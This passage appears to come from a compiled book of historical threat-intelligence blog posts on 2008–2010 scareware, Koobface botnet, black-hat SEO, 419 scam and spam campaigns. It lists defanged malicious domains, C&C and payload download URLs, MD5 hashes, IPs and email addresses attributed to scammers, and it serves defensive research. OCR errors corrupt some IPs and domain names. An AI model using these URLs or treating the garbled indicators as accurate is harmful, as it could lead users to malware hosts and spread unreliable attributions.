hxxp://glhinfueaeck.10fast.net 


Sample malicious domains known to have participate in the campaign: 
hxxp://goadult.info/go.php?sid=13 -> -> hxxp://goadult.info/go.php?sid=9 - &gt -> 


hxxp://r2606.com/go/?pid=30937 -> which is a well known Koobface 1.0 command and 
control server domain. 


Related malicious redirectors known to have participated in the campaign: 
hxxp://goadult.info - 78.109.28.16 - tech@goadult.info 


hxxp://golgo.net - 174.36.214.32 - tech@golgo.net 
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hxxp://wpills.info - 174.36.214.3 - Email: tech@wpills.info 

14.6.9 Historical OSINT - Latvian ISPs, Scareware, and the Koobface Gang Connec- 
tion (2018-10-20 22:34) 

It’s 2010 and we’ve recently stumbled upon yet another malicious and fraudulent campaign 

courtesy of the Koobface gang actively serving fake security software also known as scare- 

ware to a variety of users with the majority of malicious software conveniently parked within 


79.135.152.101 - AS2588, LatnetServiss-AS LATNET ISP successfully hosting a diverse portfolio 
of fake security software. 


In this post, I’ll provide actionable intelligence on the infrastructure behind the campaign and 
discuss in-depth the tactics techniques and procedures of the cybercriminals behind it. 


Sample malware known to have participated in the campaign: 


installer.l.exe - MD5: 4ab2cbO0dd839df64ec8d682f904827ef - Trojan.Crypt.ZPACK.Gen; 
Mal/FakeAV-CQ - Result: 9/40 (22.50 %) 


Related malicious phone back C &C server IPs: 
hxxp://av-plusonline.org/install/avplus.dll 


hxxp://av-plusonline.org/cb/real.php?id= 


Related malicious MD5s known to have participated in the campaign: 


avplus.dll - MD5: 57c79fb723fcbf4d65f4cd44e00ff3ed - FakeAlert-LF; Mal/FakeAV-CL - Re- 
sult: 6/39 (15.39 %) 


It’s gets even more interesting as hxxp://fast-payments.com - 91.188.59.27 is parked 
within Koobface botnet’s 1.0 phone back locations (hxxp://urodinam.net) and is also hosted 
within the same netblock at 91.188.59.10. 


Sample related malicious URLs known to have participated in the campaign: 


hxxp://urodinam.net/33t.php?stime=125558 
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- hxxp://91.188.59.10/opa.exe -MD5: d4aacc8d01487285be564cbd3a4abc76 - Down- 
loader.VB.7.S; Mal/Koobface-B - Result: 10/40 (25 %) 


Once executed a sample malware phones back to the following malicious C &C server 
IPs: 


hxxp://aburvalg.com/new1.php - 64.27.0.237 


- hxxp://fucking-tube.net 


The following domains use it as a name server: 


hxxp://ns1.addedantivirus.com 


Related malicius domains known to have responded to the same malicious name server: 
hxxp://antiviralpluss.org 
hxxp://antivirspluss.org 
hxxp://avonlinescanerr.org 
hxxp://online-scannerr.org 
hxxp://onlinescanerr.org 
hxxp://onlinescannerr.org 
hxxp://pretection-page.org 
hxxp://sys-mesage.org 
hxxp://av-plus-online.org 
hxxp://av-plusonline.org 
hxxp://avplus-online.org 


hxxp://avplusonline.org 
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hxxp://avplussonline.org 
hxxp://protecmesages.org 
hxxp://protect-mesagess.org 
hxxp://protectmesages.org 
hxxp://protectmesagess.org 
hxxp://protectmessages.org 
hxxp://avplus24support.com 
hxxp://searchwebway4.com 
hxxp://searchwebway5.com 
hxxp://searchwebway10.com 
hxxp://searchwebway9.com 


hxxp://searchwebway6.com 


Related malicious URLs known to have participated in the campaign: 


hxxp://avplus-online.org/buy.php?id= 


- hxxp://fast-payments.com/index.php?prodid=antivirplus O02 01 &afid= 


Related malicious domains known to have participated in the campaign: 
hxxp://antiviruspluss.org 

hxxp://avplusscanner.org 

hxxp://protection-messag.org 

hxxp://antivirs-pluss.org 

hxxp://antiviru-pluss.org 


hxxp://antivirus-p1luss.org 
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hxxp://protection-mesage.org 
hxxp://sysstem-mesage.org 
hxxp://system-message.org 
hxxp://antiviral-pluss.org 
hxxp://av-onlinescanner.org 
hxxp://avonlinescanner.org 
hxxp://avonlinescannerr.org 
hxxp://avp-scanner.org 
hxxp://avp-scannerr.org 
hxxp://avp-sscaner.org 
hxxp://avp-sscannerr.org 
hxxp://avplscaner-online.org 
hxxp://avplscanerr-online.org 
hxxp://avplsscannerr.org 
hxxp://avplus-scanerr.org 
hxxp://online-protection.org 
hxxp://antivirupluss.org 
hxxp://syssmessage.org 
hxxp://avonlinescanerr.org 
hxxp://online-scannerr.org 
hxxp://onlinescanerr.org 
hxxp://onlinescannerr.org 
hxxp://av-scanally.org 
hxxp://av-scaner-online.org 


hxxp://av-scaner-online3k.org 
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hxxp://av-scaner-onlineband.org 
hxxp://av-scaner-onlinebody.org 
hxxp://av-scaner-onlinebuzz.org 
hxxp://av-scaner-onlinecabin.org 
hxxp://av-scaner-onlinecrest.org 
hxxp://av-scaner-onlinefolk.org 
hxxp://av-scaner-onlineplan.org 
hxxp://av-scaner-onlinesite.org 
hxxp://iav-scaner-online.org 
hxxp://netav-scaner-online.org 
hxxp://techav-scaner-online.org 
hxxp://antivirspluss.org 
hxxp://sys-mesage.org 
hxxp://antiviralpluss.org 
hxxp://pretection-page.org 
hxxp://av-scaner-onlinefairy.org 
hxxp://av-scaner-onlinegrinder.org 
hxxp://av-scaner-onlinehistory.org 
hxxp://av-scaner-onlineicity.org 
hxxp://av-scaner-onlinemachine.org 
hxxp://av-scaner-onlinepeople.org 
hxxp://av-scaner-onlineretort.org 
hxxp://av-scaner-onlinereview.org 
hxxp://av-scaner-onlinetopia.org 


hxxp://directav-scaner-online.org 
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hxxp://expertav-scaner-online.org 
hxxp://orderav-scaner-online.org 
hxxp://speedyav-scaner-online.org 
hxxp://thriftyav-scaner-online.org 
hxxp://timesav-scaner-online.org 
hxxp://411online-scanner-free.org 
hxxp://dynaonline-scanner-free.org 
hxxp://fastonline-scanner-free.org 
hxxp://homeonline-scanner-free.org 
hxxp://online-scanner-freebin.org 
hxxp://online-scanner-freebuy.org 
hxxp://online-scanner-freelook.org 
hxxp://online-scanner-freemap.org 
hxxp://online-scanner-freemeet.org 
hxxp://online-scanner-freesite.org 
hxxp://online-scanner-freetent.org 
hxxp://online-scanner-freeu.org 
hxxp://online-scanner-freevolt.org 
hxxp://onlinescannerfree.org 
hxxp://av-plus-online.org 
hxxp://protecmesages.org 
hxxp://av-onlicity.org 
hxxp://av-online-scanner.org 
hxxp://av-online-scannerbid.org 


hxxp://av-online-scannercrest.org 
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hxxp://av-online-scannerfolk.org 
hxxp://av-online-scannergate.org 
hxxp://av-online-scannerland.org 
hxxp://av-online-scannerpc.org 
hxxp://av-online-scannersite.org 
hxxp://av-online-scannerweek.org 
hxxp://av-online-scannerwing.org 
hxxp://infoav-online-scanner.org 
hxxp://shopav-online-scanner.org 
hxxp://theav-online-scanners.org 
hxxp://avplus-online.org 
hxxp://protectmesages.org 
hxxp://av-scaner.org 
hxxp://av-scaners.org 
hxxp://av-scanner.org 
hxxp://av-scanners.org 
hxxp://avplussonline.org 
hxxp://avscaner.org 
hxxp://avscaners.org 
hxxp://avscanner.org 
hxxp://avscanners.org 
hxxp://eav-scaner.org 
hxxp://eav-scaners.org 
hxxp://eav-scanner.org 


hxxp://eav-scanners.org 
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hxxp://myav-scaner.org 
hxxp://myav-scaners.org 
hxxp://myav-scanner.org 
hxxp://myav-scanners.org 
hxxp://protectmessages.org 
hxxp://avplusonline.org 
hxxp://av-plusonline.org 


hxxp://protect-mesagess.org 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


14.6.10 Historical OSINT - Massive Scareware Dropping Campaign Spotted in the 
Wild (2018-10-20 22:38) 

It’s 2008 and I’ve recently spotted a currently circulating malicious and fraudulent scareware- 

serving malicious domain portfolio which I'll expose in this post with the idea to share 

actionable threat intelligence with the security community further exposing and undermining 

the cybercrime ecosystem the way we know it potentially empowering security researchers 


and third-party vendors with the necessary data to stay ahead of current and emerging 
threats. 


Related malicious domains known to have participated in the campaign: 
hxxp://5Ovirus-scanner.com 

hxxp://700virus-scanner.com 

hxxp://antivirus-test66.com 

hxxp://antivirus200scanner.com 

hxxp://antivirus600scanner.com 

hxxp://antivirus800scanner.com 


hxxp://antivirus900scanner.com 
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hxxp://av-scanner200.com 
hxxp://av-scanner300.com 
hxxp://av-scanner400.com 
hxxp://av-scanner500.com 
hxxp://inetproscan031.com 
hxxp://internet-scan020.com 
hxxp://novirus-scan00.com 
hxxp://stopvirus-scanll.com 
hxxp://stopvirus-scan13.com 
hxxp://stopvirus-scanl6.com 
hxxp://stopvirus-scan33.com 
hxxp://virus66scanner.com 
hxxp://virus77scanner.com 
hxxp://virus88scanner.com 
hxxp://antivirus-scan200.com 
hxxp://antispy-scan200.com 
hxxp://av-scanner200.com 
hxxp://av-scanner300.com 
hxxp://antivirus-scan400.com 
hxxp://antispy-scan400.com 
hxxp://av-scanner400.com 
hxxp://av-scanner500.com 
hxxp://antivirus-scan600.com 
hxxp://antispy-scan600.com 


hxxp://antivirus-scan700.com 
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hxxp://antispy-scan700.com 
hxxp://av-scanner700.com 
hxxp://antispy-scan800.com 
hxxp://antivirus-scan900.com 
hxxp://novirus-scan00.com 
hxxp://stop-virus-010.com 
hxxp://spywarescan010.com 
hxxp://antispywarehelp010.com 
hxxp://internet-scan020.com 
hxxp://internet-scanner020.com 
hxxp://insight-scan20.com 
hxxp://internet-scanner030.com 
hxxp://stop-virus-040.com 
hxxp://internet-scan040.com 
hxxp://insight-scan40.com 
hxxp://internet-scan050.com 
hxxp://internet-scanner050.com 
hxxp://insight-scan60.com 
hxxp://stop-virus-070.com 
hxxp://internet-scan070.com 
hxxp://internet-scanner070.com 
hxxp://insight-scan80.com 
hxxp://stop-virus-090.com 
hxxp://internet-scan090.com 


hxxp://internet-scanner090.com 
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hxxp://insight-scan90.com 
hxxp://antispywarehelpk0O.com 
hxxp://inetproscan001.com 
hxxp://novirus-scan0l.com 
hxxp://spyware-stop01.com 
hxxp://antivirus-inetOl.com 
hxxp://stopvirus-scanl1.com 
hxxp://inetproscan031.com 
hxxp://novirus-scan31.com 
hxxp://antivirus-inet31.com 
hxxp://novirus-scan41.com 
hxxp://antivirus-inet41.com 
hxxp://antivirus-inet51.com 
hxxp://inetproscan061.com 
hxxp://novirus-scan61.com 
hxxp://inetproscan081.com 
hxxp://novirus-scan81.com 
hxxp://inetproscan091.com 
hxxp://spyware-stopb1.com 
hxxp://spyware-stopm1.com 
hxxp://spyware-stopnl1.com 
hxxp://spyware-stopz1.com 
hxxp://antispywarehelp002.com 
hxxp://antispywarehelp022.com 


hxxp://novirus-scan22.com 
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hxxp://antispywarehelpk2.com 
hxxp://insight-scanner2.com 
hxxp://spywarescan013.com 
hxxp://stopvirus-scanl13.com 
hxxp://novirus-scan33.com 
hxxp://stopvirus-scan33.com 
hxxp://antispoywarehelp004.com 
hxxp://antispywarehelpk4.com 
hxxp://spywarescan015.com 
hxxp://novirus-scan55.com 
hxxp://insight-scanner5.com 
hxxp://stopvirus-scanl6.com 
hxxp://stopvirus-scan66.com 
hxxp://antispywarehelpk6.com 
hxxp://spywarescan017.com 
hxxp://insight-scanner7.com 
hxxp://antispywarehelp008.com 
hxxp://spywarescan018.com 
hxxp://stopvirus-scanl18.com 
hxxp://novirus-scan88.com 
hxxp://stopvirus-scan88.com 
hxxp://antivirus-test88.com 
hxxp://antispywarehelpk8.com 
hxxp://insight-scanner8.com 


hxxp://insight-scanner9.com 
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hxxp://LOscanantispyware.com 
hxxp://20scanantispyware.com 
hxxp://30scanantispyware.com 
hxxp://60scanantispyware.com 
hxxp://80scanantispyware.com 
hxxp://2scanantispyware.com 
hxxp://3scanantispyware.com 
hxxp://5scanantispyware.com 
hxxp://7scanantispyware.com 
hxxp://8scanantispyware.com 
hxxp://spyware200scan.com 
hxxp://spyware500scan.com 
hxxp://spyware800scan.com 
hxxp://spyware880scan.com 
hxxp://50virus-scanner.com 
hxxp://90virus-scanner.com 
hxxp://antivirus900scanner.com 
hxxp://antiviruslOscanner.com 
hxxp://virus77scanner.com 
hxxp://virus88scanner.com 
hxxp://netOOlantivirus.com 
hxxp://netO1llantivirus.com 
hxxp://net1l1lantivirus.com 
hxxp://netO21lantivirus.com 


hxxp://net-O2antivirus.com 
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hxxp://net222antivirus.com 
hxxp://net-O4antivirus.com 
hxxp://net-O5antivirus.com 


hxxp://net-07antivirus.com 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


14.6.11 Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild 
(2018-10-21 22:35) 
It’s 2008 and | recently came across to a pretty decent portfolio of rogue and fraudulent 


malicious scareware-serving domains successfully acquiring traffic through a variety of black 
hat SEO techniques in this particular case the airplane crash of the Polish president. 


Related malicious domains known to have participated in the campaign: 
hxxp://sarahscandies.com 
hxxp://armadasur.com 
hxxp://gayribisi.com 
hxxp://composerjohnbeal.com 
hxxp://preferredtempsinc.com 
hxxp://ojaivalleyboys.com 
hxxp://homelinkmag.com 
hxxp://worldwidestones.com 
hxxp://silsilaqasmia.com 
hxxp://vidoemo.com 
hxxp://channhu.com 


hxxp://ideasenfoco.com 
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Related malicious domains known to have participated in the campaign: 
hxxp://nhomeownersmoneysaver.com 

hxxp://preferredtempsinc.com 

hxxp://sarahscandies.com 

hxxp://channhu.com 

hxxp://intheclub.com 

hxxp://internetcabinetsdirect.com 

hxxp://silentservers.com 


hxxp://ojaivalleyboys.com 


Related malicious domains known to have participated in the campaign: 
hxxp://indigo-post.com 


hxxp://jacksonareadiscgolf.com 


Related malicious domains known to have participated in the campaign: 
hxxp://werodink.com 
hxxp://jingyi-plastic.com 


hxxp://impressionsphotographs.com 


Sample URL redirection chain: 


hxxp://cooldesigns4u.co.uk/sifr.php 


- hxxp://visittds.com/su/in.cgi?2 - 213.163.89.55 - Email: johnvernet@gmail.com 


- hxxp://scaner24.org/?affid=184 - 91.212.127.19 - Email: bobarter@xhotmail.net 
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Redirectors parked on 213.163.89.55 (AS49544, 
clude: 


hxxp://google-analyze.org 
hxxp://alioanka.com 
hxxp://robokasa.com 
hxxp://thekapita.com 
hxxp://rbomce.com 
hxxp://kolkoman.com 
hxxp://nikiten.com 
hxxp://rokobon.com 
hxxp://odile-marco.com 
hxxp://ramualdo.com 
hxxp://omiardo.com 
hxxp://nsfer.com 
hxxp://racotas.com 
hxxp://foxtris.com 
hxxp://mongoit.com 
hxxp://mangasit.com 
hxxp://convart.com 
hxxp://baidustatz.com 
hxxp://google-analyze.cn 
hxxp://statanalyze.cn 
hxxp://reycross.cn 
hxxp://m-analytics.net 


hxxp://yahoo-analytics.net 
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INTERACTIVE3D-AS Interactive3D) in- 


We've already seen hxxp://google-analyze.org and hxxp://yahoo-analytics.net in several 
related [1]mass compromise of related Embassy Web Sites. 


We'll continue monitoring the campaign and post updates as new developments take 
place. 


1. https: //ddanchev. blogspot .com/2017/05/historical-osint-inside- 2007-2009. htm 


14.6.12 Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild - Part 
Two (2018-10-21 22:47) 


It’s 2008 and I’ve recently came across to a massive black hat SEO campaign successfully 


enticing users into falling victim into fraudulent and malicious scareware-serving campaign. 
In this post I'll provide actionable intelligence on the infrastructure behind it. 


Related malicious domains and redirectors known to have participated in the campaign: 
hxxp://msh-co.com 
hxxp://incubatedesign.com 
hxxp://incubatedesign.com 
hxxp://lancemissionart.com 
hxxp://audioboxstudios.com 
hxxp://hwhitecustomhomes.com 
hxxp://indobestroof.com 
hxxp://in-prague.com 
hxxp://hvmpglobalconsulting.com 
hxxp://indierthanthou.com 
hxxp://huckleberryroad.com 
hxxp://indiepoprockhop.com 


hxxp://indianfriends.org 
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hxxp://hwhitecustomhomes.com 
hxxp://husuzem.com 
hxxp://husuzem.com 
hxxp://seankobuk.com 
hxxp://in-led.net 
hxxp://pellaiowahomes.com 
hxxp://i-leadzsite.com 
hxxp://seankobuk.com 
hxxp://i4z.com 
hxxp://in-prague.com 
hxxp://tmnttoys.com 
hxxp://hulshizer.com 
hxxp://audioboxstudios.com 
hxxp://msh-co.com 
hxxp://i-leadzsite.com 
hxxp://hulshizer.com 
hxxp://msh-co.com 
hxxp://indierthanthou.com 
hxxp://neighborhoodnursingcare.com 
hxxp://i4004.net 
hxxp://ndiepoprockhop.com 
hxxp://pugzor.net 
hxxp://indiepoprockhop.com 
hxxp://in-turkey.info 


hxxp://hwhitecustomhomes.com 
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hxxp://salsaspice.com 
hxxp://calidogrocks.com 
hxxp://incubatedesign.com 
hxxp://iac-tokyo.org 
hxxp://huckleberryroad.com 
hxxp://in-prague.com 


hxxp://hulshizer.com 


hxxp://neighborhoodnursingcare.com 


hxxp://indigo.earthman.ca 
hxxp://backyardcreations.org 
hxxp://uraband.com 
hxxp://huckleberryroad.com 
hxxp://indobestroof.com 
hxxp://indiepoprockhop.com 
hxxp://iac-tokyo.org 
hxxp://indiansexhq.com 
hxxp://calidogrocks.com 
hxxp://the-flooring-connection.com 
hxxp://pugzor.net 
hxxp://the-flooring-connection.com 
hxxp://in-prague.com 
hxxp://iac-tokyo.org 
hxxp://humordehoy.com 
hxxp://msh-co.com 


hxxp://pellaiowahomes.com 
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hxxp://salsaspice.com 
hxxp://lancemissionart.com 
hxxp://incubatedesign.com 
hxxp://iac-tokyo.org 
hxxp://tmnttoys.com 
hxxp://in-prague.com 
hxxp://backyardcreations.org 
hxxp://the-flooring-connection.com 
hxxp://sasm.net 
hxxp://indefenseof.com 
hxxp://uraband.com 
hxxp://i-need-a-websitedesigned.com 
hxxp://hwhitecustomhomes.com 


hxxp://scottiesautobody.com 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


14.6.13 Historical OSINT - Rogue Scareware Dropping Campaign Spotted in the Wild 
Courtesy of the Koobface Gang (2018-10-21 23:02) 


It’s 2010 and I’ve recently came across to a diverse portfolio of fake security software also 
known as scareware courtesy of the Koobface gang in what appears to be a [1]direct connec- 
tion between the gang’s activities and the Russian Business Network. 


In this post I’ll provide actionable intelligence on the infrastructure behind it and discuss 
in-depth the tactics techniques and procedures of the cybercriminals behind including the 
direction establishment of a direct connection between the gang’s activities and a well-known 
Russian Business Network customer. 
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Related malicious domains known to have participated in the campaign: 


hxxp://piremover.eu/hitin.php?affid=02979 - 212.117.161.142; 95.211.27.154; 95.211.27.166 


Once executed a sample malware (MD5: eedac4719229a499b3118f87f32fae35) phones 
back to the following malicious C &C server IPs: 


hxxp://xmiueftomemblatlwsrj.cn/get.php?id=02979 - 91.207.116.44 - Email: robertsi- 
monkroon@gmail.com 


Known domains known to have responded to the same malicious C &C server IPs: 
hxxp://aahsdvsynrrmwnbmpklb.cn 

hxxp://dlukhonqzidfpphkbjpb.cn 

hxxp://barykcpveiwsgexkitsg.cn 

hxxp://bfichgfqjqrtkwrsegoj.cn 


hxxp://dhbomnljzgiardzlzvkp.cn 


Once executed a sample malware phones back to the following malicious C &C service 
IPs: 


hxxp://xmiueftomemblatlwsrj.cn 


hxxp://urodinam.net - which is a [2]well known [3]Koobface 1.0 C &C server domain IP 
also seen in the "[4]Mass DreamHost Sites Compromise" exclusively profiled in this post. 


hxxp://xmiueftomemblatlwsrj.cn 


Once executed a sample malware MD5: 66dc85ad06e4595588395b2300762660; MD5: 
91944c3ae4a64c478bfba94e9e05b4c5 phones back to the following malicious C &C server 
IPs: 


hxxp://proxim.ntkrnipa.info - 83.68.16.30 - seen and observed in related analysis regard- 
ing the [5]mass Embassy Web site compromise throughout 2007 and 2009. 


Successfully dropping the following malicious Koobface MD5 
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hxxp://harmonyhudospa.se/.sys/?getexe=fb.70.exe 


Related malicious MD5s (MD known to have participated in the campaign: 
MD5: 66dc85ad06e4595588395b2300762660 


MD5: 8282ea8e92f40ee13ab716daf2430145 


Once executed a sample malware phones back to the following malicious C &C server 
IPs: 


hxxp://tehnocentr.chita.ru/.sys 


hxxp://gvpschekschov.iv-edu.ru/.sys/?action=fbgen 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


1. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.htm 


2. https://draft . blogger .com/ 
3. https: //ddanchev. blogspot .com/2010/05/koobface-gang-responds-to-10-things-you.htm 
4. https: //ddanchev.blogspot.com/2010/05/dissecting-mass-dreamhost-sites.htm 


5. https: //ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.htm 


14.6.14 Historical OSINT - Profiling a Portfolio of Active 419-Themed Scams 
(2018-10-21 23:08) 


It’s 2010 and I’ve recently decided to provide actionable intelligence on a variety of 419- 
themed scams in particular the actual malicious actors behind the campaigns with the idea 


to empower law enforcement and the community with the necessary data to track down and 
prosecute the malicious actors behind these campaigns. 


Related malicious and fraudulent emails known to have participated in the campaign: 
david ikemba@supereme-loan-finance.com - 96.24.14.4 

charles.maynard1@gmx.com - 218.31.134.111 

mr.karimahmed2004@msn.com - 41.203.231.82 


fedexdelivryservices@yahoo.com.hk - 89.187.142.72 
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chevrondisbursement@hotmail.com - 41.138.182.245 

mrslindahilldeskOOOOO@hotmail.co.uk - 41.138.188.45 

natt.westt@live.com - 115.242.40.142 

googlellanniversary2010@live.com - 115.240.21.112 

barjamessmith@gatar.io - 115.242.94.153 

delata_ecobank@web2mail.com - 202.58.64.18 

junhuan9@yahoo.cn - 68.190.243.51 

fairlandindustryltd@mail.ru - 411.138.190.213 

shkhougal@aol.com - 80.35.222.9 

jamestimeswel@rogers.com - 203.170.192.4 

alimubarakhm@hotmail.com - 115.134.5.245 

godwinemefiele2010@hotmail.com - 41.211.229.65 

skyebankplclagosnigera@gmail.com, skyebankplclagosnigera@zapak.com - 41.138.178.241 

contact.alcchmb@sify.com - 116.206.153.50 

officelottery94@yahoo.com.hk - 124.122.145.226 

kadamluk@live.com - 41.217.65.14 

garycarsonuk@w.cn - 220.225.213.221 

stella _willson48@yahoo.co.uk - 82.196.5.120 

trustlink@w.cn - 87.118.82.8 

george201009@hotmail.com - 59.120.137.197 

drmannsurmuhtarrr _155@yahoo.cn, mrstreasurecollinnsss@gmail.com - 82.114.78.222 

14.6.15 Historical OSINT - Yet Another Massive Blackhat SEO Campaign Spotted in 
the Wild (2018-10-21 23:21) 

It’s 2010 and I’ve recently stumbled upon yet another diverse portfolio of blackhat SEO 

domains this time serving rogue security software also known as scareware to unsuspecting 


users with the cybercriminals behind the campaign successfully earning fraudulent revenue in 
the process of monetizing access to malware-infected hosts largely relying on the utilization 
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of an affiliate-network based type of revenue sharing scheme. 


In this post lll profile the infrastructure behind the campaign and provide actionable in- 
telligence on the infrastructure behind it. 


Related malicious domains known to have participated in the campaign: 
hxxp://arnalduatis.com 
hxxp://batistaluciano.com 
hxxp://bethemedia.net 
hxxp://bride-beautiful.com 
hxxp://burgessandsons.com 
hxxp://carolinacane.com 
hxxp://caulfieldband.com 
hxxp://improvenewark.com 
hxxp://marsmellow.info 
hxxp://noodlesonline.com 
hxxp://queenslumber.com 
hxxp://thesolidwoodflooringcompany.com 
hxxp://wirelessexpertise.com 
hxxp://bigbangexpress.com 
hxxp://bioresonantie.net 
hxxp://clubipg.com 

hxxp://djdior.com 

hxxp://djektoyz.com 
hxxp://getraenkepool.com 


hxxp://hartmanpescar.com 
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hxxp://netkaashuis.com 

hxxp://menno.info 

hxxp://pianoaccompanistcompetition.com 

hxxp://soundwitness.org 

hxxp:/strijkvrij.com 

14.6.16 Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Drops 
Scareware (2018-10-21 23:37) 

It’s 2010 and I’ve recently intercepted a currently active malicious and fraudulent blakchat SEO 


Campaign successfully enticing users into interacting with rogue and fraudulent scareware- 
serving malicious and fraudulent campaigns. 


In this post Ill profile the infrastructure behind the campaign and provide actionable in- 
telligence on the infrastructure behind it. 


Sample URL redirection chain: 


hxxp://noticexsummary.com/re.php?Ink=1203597664 - 87.255.55.231 


- hxxp://new-pdf-reader.com/1/promo/index.asp?aff=11677 - 66.207.172.196 


= hxxps://secure-signupway.com/promo/join.aspx?siteid=3388 


Related malicious domains known to have participated in the campaign: 


hxxp://noticexsummary.com/ 


Related malicious domains known to have participated in the campaign: 


hxxp://online-tv-on-your-pc.com/p2/index.asp?aff=11680 &camp=unsub 
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We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


14.6.17 Historical OSINT - Yet Another Massive Blackhat SEO Campaign Spotted in 
the Wild Drops Scareware (2018-10-21 23:47) 
It’s 2010 and I’ve recently came across to a currently active malicious and fraudulent black- 


hat SEO campaign successfully enticing users into interacting with rogue and fraudulent 
scareware-serving malicious and fraudulent campaigns. 


In this post I’ll provide actionable intelligence on the infrastructure behind the campaign. 


Related malicious domains known to have participated in the campaign: 
hxxp://globals-advers.com 
hxxp://alldiskscheck300.com 
hxxp://multisearchl.com 
hxxp://myfreespace3.com 
hxxp://hottystars.com 
hxxp://multilang1.com 
hxxp://3gigabytes.com 
hxxp://drivemedirect.com 
hxxp://globala2.com 
hxxp://teledisons.com 
hxxp://theworldnews5.com 
hxxp://virtualblog5.com 
hxxp://grander5.com 
hxxp://5starsblog.com 


hxxp://globalreds.com 
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hxxp://global-advers.com 
hxxp://ratemyblog1.com 
hxxp://greatvideo3.com 
hxxp://beginner2009.com 
hxxp://fastwebway.com 
hxxp://blazervips.com 
hxxp://begin2009.com 
hxxp://megatradetdsO.com 
hxxp://securedonlinewebspace.com 
hxxp://proweb-info.com 
hxxp://security-www-clicks.com 
hxxp://updatedownloadlists.com 
hxxp://styleonlyclicks.cn 
hxxp://informationgohere.com 
hxxp://world-click-service.com 
hxxp://secutitypowerclicks.cn 
hxxp://securedclickuser.cn/ 
hxxp://slickoverview.com 
hxxp://viewyourclicks.com 
hxxp://clickwww2.com 
hxxp://clickadsystem.com 
hxxp://becomepoweruser.cn 


hxxp://clickoverridesystem.cn 


Related malicious domains known to have participated in the campaign: 
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hxxp://protecteduser.cn 
hxxp://internetprotectedweb.com/ 
hxxp://clicksadssystems.com 
hxxp://whereismyclick.cn 
hxxp://trustourclicks.cn 
hxxp://goldenstarclick.cn 


hxxp://defendedsystemuser.cn 


Related malicious domains known to have participated in the campaign: 
hxxp://drivemedirect.com 
hxxp://virtualblog5.com 


hxxp://fastwebway.com 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


14.6.18 Historical OSINT - Spamvertized Swine Flu) Domains - Part Two 
(2018-10-21 23:50) 


It’s 2010 and I’ve recently came across to a currently active diverse portfolio of Swine Flu 
related domains further enticing users into interacting with rogue and malicious content. 


In this post I'll profile and expose a currently active malicious domains portfolio currently 
circulating in the wild successfully involved in an ongoing variety of Swine Flu malicious spam 
Campaigns and will provide actionable intelligence on the infrastructure behind it. 


Related malicious domains known to have participated in the campaign: 


hxxp://pehwitew.cn - 58.17.3.44; 58.20.140.5; 220.248.167.126; 60.191.221.116; 
110.52.6.252 
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Related name servers known to have participated in the campaign: 
hxxp://ns6.plusspice.com - 110.52.6.252 
hxxp://ns2.morewhole.com 
hxxp://ns2.extolshare.com 
hxxp://ns2.pridesure.com 
hxxp://ns2.swellwise.com 
hxxp://ns4.boostwise.com 
hxxp://ns6.maxitrue.com 
hxxp://ns4.sharezeal.com 
hxxp://ns2.extolcalm.com 
hxxp://ns4.humortan.com 
hxxp://ns2.joysheer.com 
hxxp://ns2.zestleads.com 
hxxp://ns4.fizzleads.com 
hxxp://ns4.maxigreat.com 
hxxp://ns4.spicyrest.com 
hxxp://ns4.hardyzest.com 
hxxp://ns2.resttrust.com 
hxxp://ns2.alertwow.com 
hxxp://ns2.savetangy.com 
hxxp://ns4.lovetangy.com 


hxxp://ns2.coyrosy.com 


Related malicious domains known to have participated in the campaign: 


hxxp://jihpuyab.cn 
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hxxp://dabwedib.cn 
hxxp://jehrawob.cn 
hxxp://lacgidub.cn 
hxxp://fektiyub.cn 
hxxp://qucmolac.cn 
hxxp://xopfekec.cn 
hxxp://gamfesec.cn 
hxxp://xokdemic.cn 
hxxp://papxunic.cn 
hxxp://jiqlosic.cn 
hxxp://liynaloc.cn 
hxxp://womrifuc.cn 
hxxp://picduluc.cn 
hxxp://feqtawuc.cn 
hxxp://becfuzuc.cn 
hxxp://ximnusad.cn 
hxxp://limyoxed.cn 
hxxp://cokgozed.cn 
hxxp://qursehod.cn 
hxxp://pimfilod.cn 
hxxp://zofxitod.cn 
hxxp://pehdiwod.cn 
hxxp://ruvvabud.cn 
hxxp://japwolud.cn 


hxxp://qolqaqaf.cn 
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hxxp://tacreyaf.cn 
hxxp://rajvufef.cn 
hxxp://hiwjadif.cn 
hxxp://pejjenif.cn 
hxxp://nakyabof.cn 
hxxp://rijgihag.cn 
hxxp://pipgaqag.cn 
hxxp://jaxkewag.cn 
hxxp://cikqumog.cn 
hxxp://tircodug.cn 
hxxp://juryaqug.cn 
hxxp://yawfadah.cn 
hxxp://yabtudah.cn 
hxxp://qifhihah.cn 
hxxp://xeyselah.cn 
hxxp://cotmetah.cn 
hxxp://bulmitah.cn 
hxxp://tegbejih.cn 
hxxp://tuymokih.cn 
hxxp://modqopoh.cn 
hxxp://qejpoduh.cn 
hxxp://xajsomuh.cn 
hxxp://wisziruh.cn 
hxxp://maypajej.cn 


hxxp://tivhikej.cn 
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hxxp://holmayej.cn 
hxxp://dabtizej.cn 
hxxp://koyxuwij.cn 
hxxp://romxebuj.cn 
hxxp://hilzuluj.cn 
hxxp://zulfavuj.cn 
hxxp://vojhowuj.cn 
hxxp://daldukak.cn 
hxxp://rakvirak.cn 
hxxp://fimresak.cn 
hxxp://zepyosak.cn 
hxxp://tovpiwak.cn 
hxxp://raqhizak.cn 
hxxp://salhibik.cn 
hxxp://xonzulik.cn 
hxxp://jezwutik.cn 
hxxp://lungodok.cn 
hxxp://qeytakok.cn 
hxxp://weswukuk.cn 
hxxp://lawmamuk.cn 
hxxp://xomhoruk.cn 
hxxp://zitkowuk.cn 
hxxp://hoyzexuk.cn 
hxxp://cutholal.cn 


hxxp://jidtecel.cn 
5704 


hxxp://jovmuhil.cn 
hxxp://guxdipil.cn 
hxxp://kujkuwil.cn 
hxxp://kojvifol.cn 
hxxp://zitgohol.cn 
hxxp://cosxotol.cn 
hxxp://wahwoxol.cn 
hxxp://siqsayol.cn 
